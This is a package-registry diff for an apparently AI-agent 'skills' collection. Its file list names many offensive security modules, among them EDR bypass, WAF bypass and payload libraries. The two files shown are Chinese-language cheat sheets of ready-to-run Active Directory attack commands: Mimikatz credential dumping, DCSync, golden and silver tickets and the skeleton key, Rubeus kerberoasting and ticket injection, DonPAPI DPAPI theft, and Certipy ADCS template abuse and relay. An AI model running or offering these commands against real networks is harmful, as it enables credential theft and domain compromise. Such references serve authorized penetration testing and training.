opencode-skills-collection 4.0.43 → 4.0.45
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/bundled-skills/.antigravity-install-manifest.json +47 -1
- package/bundled-skills/api-rate-limit-handler/SKILL.md +282 -0
- package/bundled-skills/api-security/SKILL.md +205 -0
- package/bundled-skills/api-security/references/jwt-oauth-testing.md +123 -0
- package/bundled-skills/api-security/references/rest-graphql-testing.md +137 -0
- package/bundled-skills/apk-reverse/SKILL.md +438 -0
- package/bundled-skills/apk-reverse/references/android-advanced.md +365 -0
- package/bundled-skills/apk-reverse/references/apk-security-checklist.md +230 -0
- package/bundled-skills/apk-reverse/references/frida-bypass-kit.md +70 -0
- package/bundled-skills/apk-reverse/references/frida-cookbook.md +472 -0
- package/bundled-skills/attack-chain/SKILL.md +185 -0
- package/bundled-skills/attack-chain/references/attack-playbooks.md +126 -0
- package/bundled-skills/attack-chain/references/evasion-cheatsheet.md +133 -0
- package/bundled-skills/attack-chain/references/lifecycle-checklist.md +37 -0
- package/bundled-skills/attack-chain/references/phases.md +490 -0
- package/bundled-skills/binary-diff/SKILL.md +320 -0
- package/bundled-skills/binary-diff/references/prompt-template.md +173 -0
- package/bundled-skills/browser-extension-reverse/SKILL.md +99 -0
- package/bundled-skills/browser-extension-reverse/references/extension-analysis.md +10 -0
- package/bundled-skills/case-review/SKILL.md +167 -0
- package/bundled-skills/cloud-k8s/SKILL.md +124 -0
- package/bundled-skills/cloud-k8s/references/k8s-cloud-checklist.md +16 -0
- package/bundled-skills/code-audit/SKILL.md +92 -0
- package/bundled-skills/code-audit/references/sast-review-checklist.md +10 -0
- package/bundled-skills/database-security/SKILL.md +81 -0
- package/bundled-skills/database-security/references/db-misconfig-checklist.md +9 -0
- package/bundled-skills/diagram-generator/SKILL.md +199 -0
- package/bundled-skills/diagram-generator/references/README.md +3 -0
- package/bundled-skills/diagram-generator/references/diagram-patterns.md +254 -0
- package/bundled-skills/digital-forensics/SKILL.md +93 -0
- package/bundled-skills/digital-forensics/references/forensics-triage.md +10 -0
- package/bundled-skills/docs/integrations/jetski-cortex.md +3 -3
- package/bundled-skills/docs/integrations/jetski-gemini-loader/README.md +1 -1
- package/bundled-skills/docs/maintainers/repo-growth-seo.md +1 -1
- package/bundled-skills/docs/maintainers/skills-update-guide.md +1 -1
- package/bundled-skills/docs/sources/sources.md +9 -0
- package/bundled-skills/docs/users/aas-core.md +1 -1
- package/bundled-skills/docs/users/bundles.md +1 -1
- package/bundled-skills/docs/users/claude-code-skills.md +1 -1
- package/bundled-skills/docs/users/gemini-cli-skills.md +1 -1
- package/bundled-skills/docs/users/kiro-integration.md +1 -1
- package/bundled-skills/docs/users/usage.md +3 -3
- package/bundled-skills/docs/users/visual-guide.md +4 -4
- package/bundled-skills/docs-generator/SKILL.md +197 -0
- package/bundled-skills/docs-generator/references/security-report-templates.md +348 -0
- package/bundled-skills/docs-generator/references/templates.md +102 -0
- package/bundled-skills/docs-generator/references/vendor-report-rules.md +263 -0
- package/bundled-skills/dotnet-reverse/SKILL.md +197 -0
- package/bundled-skills/dotnet-reverse/references/common-workflow.md +171 -0
- package/bundled-skills/dotnet-reverse/references/obfuscators.md +145 -0
- package/bundled-skills/dotnet-reverse/references/sharp-tools.md +164 -0
- package/bundled-skills/edr-bypass-re/SKILL.md +248 -0
- package/bundled-skills/edr-bypass-re/references/hook-survey.md +226 -0
- package/bundled-skills/edr-bypass-re/references/telemetry-blinding.md +346 -0
- package/bundled-skills/edr-bypass-re/references/unhook-techniques.md +338 -0
- package/bundled-skills/email-security/SKILL.md +81 -0
- package/bundled-skills/email-security/references/email-auth-checklist.md +8 -0
- package/bundled-skills/firmware-pentest/SKILL.md +381 -0
- package/bundled-skills/firmware-pentest/references/emba-automated-analysis.md +192 -0
- package/bundled-skills/firmware-pentest/references/emulation-and-fuzz.md +337 -0
- package/bundled-skills/firmware-pentest/references/extraction-methodology.md +285 -0
- package/bundled-skills/ghidra-reverse/SKILL.md +98 -0
- package/bundled-skills/ghidra-reverse/references/ghidra-cheatsheet.md +12 -0
- package/bundled-skills/go-rust-reverse/SKILL.md +82 -0
- package/bundled-skills/go-rust-reverse/references/go-rust-notes.md +5 -0
- package/bundled-skills/hardware-security/SKILL.md +80 -0
- package/bundled-skills/hardware-security/references/debug-interface-triage.md +7 -0
- package/bundled-skills/ida-reverse/SKILL.md +401 -0
- package/bundled-skills/ida-reverse/references/LOCAL-SETUP.md +66 -0
- package/bundled-skills/ida-reverse/references/ida-mcp-cheatsheet.md +515 -0
- package/bundled-skills/identity-federation/SKILL.md +81 -0
- package/bundled-skills/identity-federation/references/sso-flow-checklist.md +9 -0
- package/bundled-skills/instructree/SKILL.md +94 -0
- package/bundled-skills/js-reverse/SKILL.md +239 -0
- package/bundled-skills/js-reverse/references/ast-deobfuscation.md +3 -0
- package/bundled-skills/js-reverse/references/automation-entry.md +12 -0
- package/bundled-skills/js-reverse/references/env-patching.md +6 -0
- package/bundled-skills/js-reverse/references/fallbacks.md +8 -0
- package/bundled-skills/js-reverse/references/instrumentation.md +9 -0
- package/bundled-skills/js-reverse/references/local-rebuild.md +11 -0
- package/bundled-skills/js-reverse/references/mcp-task-template.md +30 -0
- package/bundled-skills/js-reverse/references/node-env-rebuild.md +9 -0
- package/bundled-skills/js-reverse/references/output-contract.md +9 -0
- package/bundled-skills/js-reverse/references/task-artifacts.md +11 -0
- package/bundled-skills/js-reverse/references/task-input-template.md +11 -0
- package/bundled-skills/js-reverse/references/tool-defaults.md +7 -0
- package/bundled-skills/llm-security/SKILL.md +160 -0
- package/bundled-skills/llm-security/references/agent-obedience-engineering.md +243 -0
- package/bundled-skills/llm-security/references/agent-security-testing.md +116 -0
- package/bundled-skills/llm-security/references/owasp-llm-top10.md +48 -0
- package/bundled-skills/llm-security/references/prompt-injection-methodology.md +107 -0
- package/bundled-skills/loki-mode/examples/todo-app-generated/backend/package-lock.json +4 -4
- package/bundled-skills/loki-mode/examples/todo-app-generated/backend/package.json +1 -1
- package/bundled-skills/macos-reverse/SKILL.md +85 -0
- package/bundled-skills/macos-reverse/references/macho-triage.md +10 -0
- package/bundled-skills/malware-analysis/SKILL.md +311 -0
- package/bundled-skills/malware-analysis/references/anti-analysis-techniques.md +205 -0
- package/bundled-skills/malware-analysis/references/sandbox-orchestration.md +204 -0
- package/bundled-skills/malware-analysis/references/yara-sigma-rules.md +232 -0
- package/bundled-skills/mobile-reverse/SKILL.md +222 -0
- package/bundled-skills/mobile-reverse/references/anti-detection-bypass.md +182 -0
- package/bundled-skills/mobile-reverse/references/frida-objection-deep.md +218 -0
- package/bundled-skills/mobile-reverse/references/ios-reverse-guide.md +177 -0
- package/bundled-skills/muapi-media/SKILL.md +311 -0
- package/bundled-skills/ot-ics/SKILL.md +117 -0
- package/bundled-skills/ot-ics/references/ot-safe-assessment.md +10 -0
- package/bundled-skills/patch-diff-exploit/SKILL.md +278 -0
- package/bundled-skills/patch-diff-exploit/references/diff-tools-comparison.md +271 -0
- package/bundled-skills/patch-diff-exploit/references/patch-tuesday-workflow.md +253 -0
- package/bundled-skills/patch-diff-exploit/references/root-cause-and-poc.md +198 -0
- package/bundled-skills/pentest-tools/SKILL.md +346 -0
- package/bundled-skills/pentest-tools/references/ai-pentest-agents.md +148 -0
- package/bundled-skills/pentest-tools/references/ai-pentesting-landscape-2026.md +73 -0
- package/bundled-skills/pentest-tools/references/automation-loop-pattern.md +153 -0
- package/bundled-skills/pentest-tools/references/awesome-pentest-digest.md +175 -0
- package/bundled-skills/pentest-tools/references/burpsuite-mcp-guide.md +769 -0
- package/bundled-skills/pentest-tools/references/client-side-lab-playbook.md +155 -0
- package/bundled-skills/pentest-tools/references/kali-mcp-ecosystem.md +119 -0
- package/bundled-skills/pentest-tools/references/msf-protocol.md +169 -0
- package/bundled-skills/pentest-tools/references/network-attack-defense.md +350 -0
- package/bundled-skills/pentest-tools/references/nuclei-guide-2026.md +157 -0
- package/bundled-skills/pentest-tools/references/payloads.md +32 -0
- package/bundled-skills/pentest-tools/references/pentest-ai-agents-matrix.md +117 -0
- package/bundled-skills/pentest-tools/references/pentest-loop.md +270 -0
- package/bundled-skills/pentest-tools/references/recon-pipeline.md +154 -0
- package/bundled-skills/pentest-tools/references/templates/findings.md +21 -0
- package/bundled-skills/pentest-tools/references/templates/progress.md +17 -0
- package/bundled-skills/pentest-tools/references/templates/rules.md +35 -0
- package/bundled-skills/pentest-tools/references/templates/scope.md +29 -0
- package/bundled-skills/pentest-tools/references/templates/task_plan.md +27 -0
- package/bundled-skills/pentest-tools/references/web-attack-cheatsheet.md +387 -0
- package/bundled-skills/pentest-tools/src-hunter/SKILL.md +243 -0
- package/bundled-skills/pentest-tools/src-hunter/references/README.en.md +115 -0
- package/bundled-skills/pentest-tools/src-hunter/references/README.md +148 -0
- package/bundled-skills/pentest-tools/src-hunter/references/dictionaries/00-index.md +44 -0
- package/bundled-skills/pentest-tools/src-hunter/references/dictionaries/chinese-srcfingerprints.md +515 -0
- package/bundled-skills/pentest-tools/src-hunter/references/dictionaries/default-credentials-cn.md +274 -0
- package/bundled-skills/pentest-tools/src-hunter/references/industry/00-index.md +66 -0
- package/bundled-skills/pentest-tools/src-hunter/references/industry/banking-finance.md +338 -0
- package/bundled-skills/pentest-tools/src-hunter/references/industry/telecom-isp.md +315 -0
- package/bundled-skills/pentest-tools/src-hunter/references/methodology/00-index.md +68 -0
- package/bundled-skills/pentest-tools/src-hunter/references/methodology/01-attack-priority.md +143 -0
- package/bundled-skills/pentest-tools/src-hunter/references/methodology/02-bypass-toolkit.md +357 -0
- package/bundled-skills/pentest-tools/src-hunter/references/methodology/03-evidence-discipline.md +205 -0
- package/bundled-skills/pentest-tools/src-hunter/references/methodology/04-control-gap-hunting.md +238 -0
- package/bundled-skills/pentest-tools/src-hunter/references/methodology/05-srctimebox-priority.md +161 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet/adcs/346/224/273/345/207/273.md +254 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet/exchange/346/224/273/345/207/273.md +254 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet/sharepoint/346/224/273/345/207/273.md +113 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//344/277/241/346/201/257/346/224/266/351/233/206.md +947 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//345/205/215/346/235/200/344/270/216/350/247/204/351/201/277.md +780 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//345/207/255/350/257/201/347/252/203/345/217/226.md +1259 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//345/237/237/346/270/227/351/200/217/346/224/273/345/207/273.md +753 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//346/235/203/351/231/220/346/217/220/345/215/207.md +819 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//346/235/203/351/231/220/347/273/264/346/214/201.md +577 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//346/250/252/345/220/221/347/247/273/345/212/250.md +838 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//351/232/247/351/201/223/344/273/243/347/220/206.md +604 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/ai/345/256/211/345/205/250.md +698 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/api/345/256/211/345/205/250.md +1935 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/csrf/350/267/250/347/253/231/350/257/267/346/261/202/344/274/252/351/200/240.md +952 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/jwt/345/256/211/345/205/250.md +496 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/lfi-rfi/346/226/207/344/273/266/345/214/205/345/220/253.md +1365 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/rce/350/277/234/347/250/213/344/273/243/347/240/201/346/211/247/350/241/214.md +1329 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/sql-nosql/346/263/250/345/205/245.md +1924 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/ssrf/346/234/215/345/212/241/347/253/257/350/257/267/346/261/202/344/274/252/351/200/240.md +1256 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/ssti/346/250/241/346/235/277/346/263/250/345/205/245.md +1151 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/websocket/345/256/211/345/205/250.md +487 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/xss/350/267/250/347/253/231/350/204/232/346/234/254.md +1465 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/xxe/345/256/236/344/275/223/346/263/250/345/205/245.md +815 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//344/270/232/345/212/241/351/200/273/350/276/221/346/274/217/346/264/236.md +594 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//344/272/221/345/256/211/345/205/250/346/274/217/346/264/236.md +561 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//344/276/233/345/272/224/351/223/276/346/224/273/345/207/273.md +399 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//345/216/237/345/236/213/351/223/276/346/261/241/346/237/223.md +401 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//345/274/200/346/224/276/351/207/215/345/256/232/345/220/221.md +396 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//346/226/207/344/273/266/346/274/217/346/264/236.md +0 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//346/241/206/346/236/266/346/274/217/346/264/236.md +2304 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//347/202/271/345/207/273/345/212/253/346/214/201.md +339 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//347/274/223/345/255/230/344/270/216cdn/345/256/211/345/205/250.md +497 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//350/256/244/350/257/201/346/274/217/346/264/236.md +1778 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//350/257/267/346/261/202/350/265/260/347/247/201.md +854 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/index.md +69 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools/web/346/270/227/351/200/217.md +662 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools/windows/346/270/227/351/200/217.md +100 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//344/277/241/346/201/257/346/224/266/351/233/206.md +852 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//345/206/205/347/275/221/346/270/227/351/200/217.md +873 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//345/207/255/350/257/201/347/252/203/345/217/226.md +186 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//345/237/237/346/270/227/351/200/217.md +50 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//345/257/206/347/240/201/346/224/273/345/207/273.md +462 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//346/235/203/351/231/220/346/217/220/345/215/207.md +168 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//346/274/217/346/264/236/345/210/251/347/224/250.md +445 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//347/263/273/347/273/237/345/221/275/344/273/244.md +410 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//347/272/242/351/230/237/345/267/245/345/205/267.md +64 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//347/274/226/347/240/201/350/247/243/347/240/201.md +226 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//351/232/247/351/201/223/344/273/243/347/220/206.md +84 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/waf-bypass.md +6504 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/00-index.md +57 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/api-rest.md +2050 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/arbitrary-x-authz.md +481 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/dos.md +615 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/file-upload.md +1365 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/graphql.md +253 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/http-smuggling.md +924 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/info-disclosure.md +432 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/intranet-postexp.md +4845 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/llm-prompt-injection.md +1394 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/logic-flaws.md +1796 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/mobile.md +397 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/oauth-saml-jwt.md +2504 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/path-traversal.md +1297 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/race-conditions.md +207 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/rce.md +4829 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/sqli.md +1620 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/ssrf-cache-host.md +2098 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/unauth-access.md +330 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/xss.md +1159 -0
- package/bundled-skills/pentest-tools/src-hunter/references/templates/report-submission.md +346 -0
- package/bundled-skills/pentest-tools/src-hunter/references/tools/mcp-jshook.md +174 -0
- package/bundled-skills/protocol-reverse/SKILL.md +108 -0
- package/bundled-skills/protocol-reverse/references/protocol-workflow.md +29 -0
- package/bundled-skills/pwn-chain/SKILL.md +209 -0
- package/bundled-skills/pwn-chain/references/heap-pwn.md +283 -0
- package/bundled-skills/pwn-chain/references/kernel-pwn.md +370 -0
- package/bundled-skills/pwn-chain/references/stack-pwn.md +312 -0
- package/bundled-skills/radare2/SKILL.md +460 -0
- package/bundled-skills/radare2/references/cheatsheet.md +129 -0
- package/bundled-skills/radio-sdr/SKILL.md +77 -0
- package/bundled-skills/radio-sdr/references/sdr-lab-rules.md +6 -0
- package/bundled-skills/reverse-browser-automation/SKILL.md +249 -0
- package/bundled-skills/reverse-browser-automation/references/playwright-cheatsheet.md +425 -0
- package/bundled-skills/reverse-engineering/SKILL.md +213 -0
- package/bundled-skills/reverse-engineering/dsl-vm-reverse/SKILL.md +388 -0
- package/bundled-skills/reverse-engineering/references/ai-assisted-re.md +149 -0
- package/bundled-skills/reverse-engineering/references/anti-analysis.md +836 -0
- package/bundled-skills/reverse-engineering/references/awesome-re-resources.md +135 -0
- package/bundled-skills/reverse-engineering/references/crypto-decode-tools.md +220 -0
- package/bundled-skills/reverse-engineering/references/elf-analysis.md +296 -0
- package/bundled-skills/reverse-engineering/references/field-notes.md +540 -0
- package/bundled-skills/reverse-engineering/references/go-reverse.md +240 -0
- package/bundled-skills/reverse-engineering/references/kernel-driver-reverse.md +298 -0
- package/bundled-skills/reverse-engineering/references/languages-compiled.md +587 -0
- package/bundled-skills/reverse-engineering/references/languages-platforms.md +486 -0
- package/bundled-skills/reverse-engineering/references/languages.md +499 -0
- package/bundled-skills/reverse-engineering/references/nonpe-format-cookbook.md +301 -0
- package/bundled-skills/reverse-engineering/references/ollvm-deobfuscation.md +501 -0
- package/bundled-skills/reverse-engineering/references/patterns-ctf-2.md +397 -0
- package/bundled-skills/reverse-engineering/references/patterns-ctf-3.md +719 -0
- package/bundled-skills/reverse-engineering/references/patterns-ctf.md +532 -0
- package/bundled-skills/reverse-engineering/references/patterns.md +801 -0
- package/bundled-skills/reverse-engineering/references/platforms-hardware.md +304 -0
- package/bundled-skills/reverse-engineering/references/platforms.md +442 -0
- package/bundled-skills/reverse-engineering/references/re-agent-workflow.md +240 -0
- package/bundled-skills/reverse-engineering/references/tools-advanced.md +822 -0
- package/bundled-skills/reverse-engineering/references/tools-dynamic.md +846 -0
- package/bundled-skills/reverse-engineering/references/tools.md +546 -0
- package/bundled-skills/supply-chain-security/SKILL.md +180 -0
- package/bundled-skills/supply-chain-security/references/cicd-pipeline-security.md +137 -0
- package/bundled-skills/supply-chain-security/references/sbom-sca-methodology.md +74 -0
- package/bundled-skills/thick-client/SKILL.md +104 -0
- package/bundled-skills/thick-client/references/thick-client-checklist.md +9 -0
- package/bundled-skills/threat-hunting/SKILL.md +94 -0
- package/bundled-skills/threat-hunting/references/hunting-loop.md +5 -0
- package/bundled-skills/threat-intelligence/SKILL.md +176 -0
- package/bundled-skills/threat-intelligence/references/x-public-intelligence.md +93 -0
- package/bundled-skills/tree-ring-memory/SKILL.md +29 -9
- package/bundled-skills/wifi-wireless/SKILL.md +80 -0
- package/bundled-skills/wifi-wireless/references/wireless-lab-rules.md +6 -0
- package/bundled-skills/windows-ad/SKILL.md +109 -0
- package/bundled-skills/windows-ad/references/ad-attack-paths.md +12 -0
- package/package.json +1 -1
- package/skills_index.json +1214 -2
|
@@ -0,0 +1,186 @@
|
|
|
1
|
+
# 凭证窃取
|
|
2
|
+
|
|
3
|
+
_3 条工具命令_
|
|
4
|
+
|
|
5
|
+
### Mimikatz `mimikatz-tool`
|
|
6
|
+
_Windows凭证提取工具_
|
|
7
|
+
|
|
8
|
+
**Step 0**
|
|
9
|
+
> 获取Debug权限
|
|
10
|
+
_platform: windows_
|
|
11
|
+
```
|
|
12
|
+
privilege::debug
|
|
13
|
+
```
|
|
14
|
+
|
|
15
|
+
**Step 0**
|
|
16
|
+
> 抓取所有登录凭证
|
|
17
|
+
_platform: windows_
|
|
18
|
+
```
|
|
19
|
+
sekurlsa::logonpasswords
|
|
20
|
+
```
|
|
21
|
+
|
|
22
|
+
**Step 0**
|
|
23
|
+
> 从LSASS转储文件提取
|
|
24
|
+
_platform: windows_
|
|
25
|
+
```
|
|
26
|
+
sekurlsa::minidump lsass.dmp
|
|
27
|
+
```
|
|
28
|
+
|
|
29
|
+
**Step 0**
|
|
30
|
+
> 哈希传递攻击
|
|
31
|
+
_platform: windows_
|
|
32
|
+
```
|
|
33
|
+
sekurlsa::pth /user:Administrator /domain:domain.com /ntlm:HASH
|
|
34
|
+
```
|
|
35
|
+
|
|
36
|
+
**Step 0**
|
|
37
|
+
> DCSync获取域管哈希
|
|
38
|
+
_platform: windows_
|
|
39
|
+
```
|
|
40
|
+
lsadump::dcsync /domain:domain.com /user:Administrator
|
|
41
|
+
```
|
|
42
|
+
|
|
43
|
+
**Step 0**
|
|
44
|
+
> 导出SAM数据库
|
|
45
|
+
_platform: windows_
|
|
46
|
+
```
|
|
47
|
+
lsadump::sam
|
|
48
|
+
```
|
|
49
|
+
|
|
50
|
+
**Step 0**
|
|
51
|
+
> 导出LSA密钥
|
|
52
|
+
_platform: windows_
|
|
53
|
+
```
|
|
54
|
+
lsadump::lsa /inject
|
|
55
|
+
```
|
|
56
|
+
|
|
57
|
+
**Step 0**
|
|
58
|
+
> 生成黄金票据
|
|
59
|
+
_platform: windows_
|
|
60
|
+
```
|
|
61
|
+
kerberos::golden /domain:domain.com /sid:S-1-5-21-xxx /krbtgt:HASH /user:Administrator /ptt
|
|
62
|
+
```
|
|
63
|
+
|
|
64
|
+
**Step 0**
|
|
65
|
+
> 生成白银票据
|
|
66
|
+
_platform: windows_
|
|
67
|
+
```
|
|
68
|
+
kerberos::golden /domain:domain.com /sid:S-1-5-21-xxx /target:server /service:cifs /rc4:HASH /user:Administrator /ptt
|
|
69
|
+
```
|
|
70
|
+
|
|
71
|
+
**Step 0**
|
|
72
|
+
> 列出Kerberos票据
|
|
73
|
+
_platform: windows_
|
|
74
|
+
```
|
|
75
|
+
kerberos::list
|
|
76
|
+
```
|
|
77
|
+
|
|
78
|
+
**Step 0**
|
|
79
|
+
> 导出Kerberos票据
|
|
80
|
+
_platform: windows_
|
|
81
|
+
```
|
|
82
|
+
kerberos::list /export
|
|
83
|
+
```
|
|
84
|
+
|
|
85
|
+
**Step 0**
|
|
86
|
+
> 植入万能密码
|
|
87
|
+
_platform: windows_
|
|
88
|
+
```
|
|
89
|
+
misc::skeleton
|
|
90
|
+
```
|
|
91
|
+
|
|
92
|
+
---
|
|
93
|
+
|
|
94
|
+
### Rubeus `rubeus-tool`
|
|
95
|
+
_Kerberos攻击工具_
|
|
96
|
+
|
|
97
|
+
**Step 0**
|
|
98
|
+
> Kerberoasting攻击
|
|
99
|
+
_platform: windows_
|
|
100
|
+
```
|
|
101
|
+
Rubeus.exe kerberoast /stats
|
|
102
|
+
```
|
|
103
|
+
|
|
104
|
+
**Step 0**
|
|
105
|
+
> AS-REP Roasting攻击
|
|
106
|
+
_platform: windows_
|
|
107
|
+
```
|
|
108
|
+
Rubeus.exe asreproast /user:username
|
|
109
|
+
```
|
|
110
|
+
|
|
111
|
+
**Step 0**
|
|
112
|
+
> 请求TGT票据
|
|
113
|
+
_platform: windows_
|
|
114
|
+
```
|
|
115
|
+
Rubeus.exe asktgt /user:username /password:password
|
|
116
|
+
```
|
|
117
|
+
|
|
118
|
+
**Step 0**
|
|
119
|
+
> 请求服务票据
|
|
120
|
+
_platform: windows_
|
|
121
|
+
```
|
|
122
|
+
Rubeus.exe asktgs /service:cifs/server.domain.com /ticket:TICKET_BASE64
|
|
123
|
+
```
|
|
124
|
+
|
|
125
|
+
**Step 0**
|
|
126
|
+
> S4U协议攻击
|
|
127
|
+
_platform: windows_
|
|
128
|
+
```
|
|
129
|
+
Rubeus.exe s4u /user:service_account /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/target
|
|
130
|
+
```
|
|
131
|
+
|
|
132
|
+
**Step 0**
|
|
133
|
+
> 生成黄金票据
|
|
134
|
+
_platform: windows_
|
|
135
|
+
```
|
|
136
|
+
Rubeus.exe golden /domain:domain.com /sid:S-1-5-21-xxx /krbtgt:HASH /user:Administrator
|
|
137
|
+
```
|
|
138
|
+
|
|
139
|
+
**Step 0**
|
|
140
|
+
> 注入票据
|
|
141
|
+
_platform: windows_
|
|
142
|
+
```
|
|
143
|
+
Rubeus.exe ptt /ticket:TICKET_BASE64
|
|
144
|
+
```
|
|
145
|
+
|
|
146
|
+
**Step 0**
|
|
147
|
+
> 列出当前票据
|
|
148
|
+
_platform: windows_
|
|
149
|
+
```
|
|
150
|
+
Rubeus.exe klist
|
|
151
|
+
```
|
|
152
|
+
|
|
153
|
+
**Step 0**
|
|
154
|
+
> 监视新票据
|
|
155
|
+
_platform: windows_
|
|
156
|
+
```
|
|
157
|
+
Rubeus.exe monitor /interval:30
|
|
158
|
+
```
|
|
159
|
+
|
|
160
|
+
---
|
|
161
|
+
|
|
162
|
+
### DonPAPI `donpapi-tool`
|
|
163
|
+
_DPAPI凭证提取工具_
|
|
164
|
+
|
|
165
|
+
**Step 0**
|
|
166
|
+
> 提取DPAPI凭证
|
|
167
|
+
_platform: linux_
|
|
168
|
+
```
|
|
169
|
+
donpapi domain/user:password@target_ip
|
|
170
|
+
```
|
|
171
|
+
|
|
172
|
+
**Step 0**
|
|
173
|
+
> 使用哈希认证
|
|
174
|
+
_platform: linux_
|
|
175
|
+
```
|
|
176
|
+
donpapi -hashes :NTHASH domain/user@target_ip
|
|
177
|
+
```
|
|
178
|
+
|
|
179
|
+
**Step 0**
|
|
180
|
+
> 批量提取凭证
|
|
181
|
+
_platform: linux_
|
|
182
|
+
```
|
|
183
|
+
donpapi domain/user:password@targets.txt
|
|
184
|
+
```
|
|
185
|
+
|
|
186
|
+
---
|
|
@@ -0,0 +1,50 @@
|
|
|
1
|
+
# 域渗透
|
|
2
|
+
|
|
3
|
+
_1 条工具命令_
|
|
4
|
+
|
|
5
|
+
### Certipy `certipy-tool`
|
|
6
|
+
_ADCS证书服务攻击工具_
|
|
7
|
+
|
|
8
|
+
**Step 0**
|
|
9
|
+
> 枚举证书服务
|
|
10
|
+
_platform: linux_
|
|
11
|
+
```
|
|
12
|
+
certipy find -u user@domain.com -p password -dc-ip dc_ip
|
|
13
|
+
```
|
|
14
|
+
|
|
15
|
+
**Step 0**
|
|
16
|
+
> ESC1模板滥用
|
|
17
|
+
_platform: linux_
|
|
18
|
+
```
|
|
19
|
+
certipy req -u user@domain.com -p password -ca CA_NAME -template Template -upn Administrator@domain.com
|
|
20
|
+
```
|
|
21
|
+
|
|
22
|
+
**Step 0**
|
|
23
|
+
> ESC2任意用途
|
|
24
|
+
_platform: linux_
|
|
25
|
+
```
|
|
26
|
+
certipy req -u user@domain.com -p password -ca CA_NAME -template VULNERABLE_TEMPLATE
|
|
27
|
+
```
|
|
28
|
+
|
|
29
|
+
**Step 0**
|
|
30
|
+
> 使用证书认证
|
|
31
|
+
_platform: linux_
|
|
32
|
+
```
|
|
33
|
+
certipy auth -pfx administrator.pfx -domain domain.com
|
|
34
|
+
```
|
|
35
|
+
|
|
36
|
+
**Step 0**
|
|
37
|
+
> HTTP中继攻击
|
|
38
|
+
_platform: linux_
|
|
39
|
+
```
|
|
40
|
+
certipy relay -ca ca_server -template DomainController
|
|
41
|
+
```
|
|
42
|
+
|
|
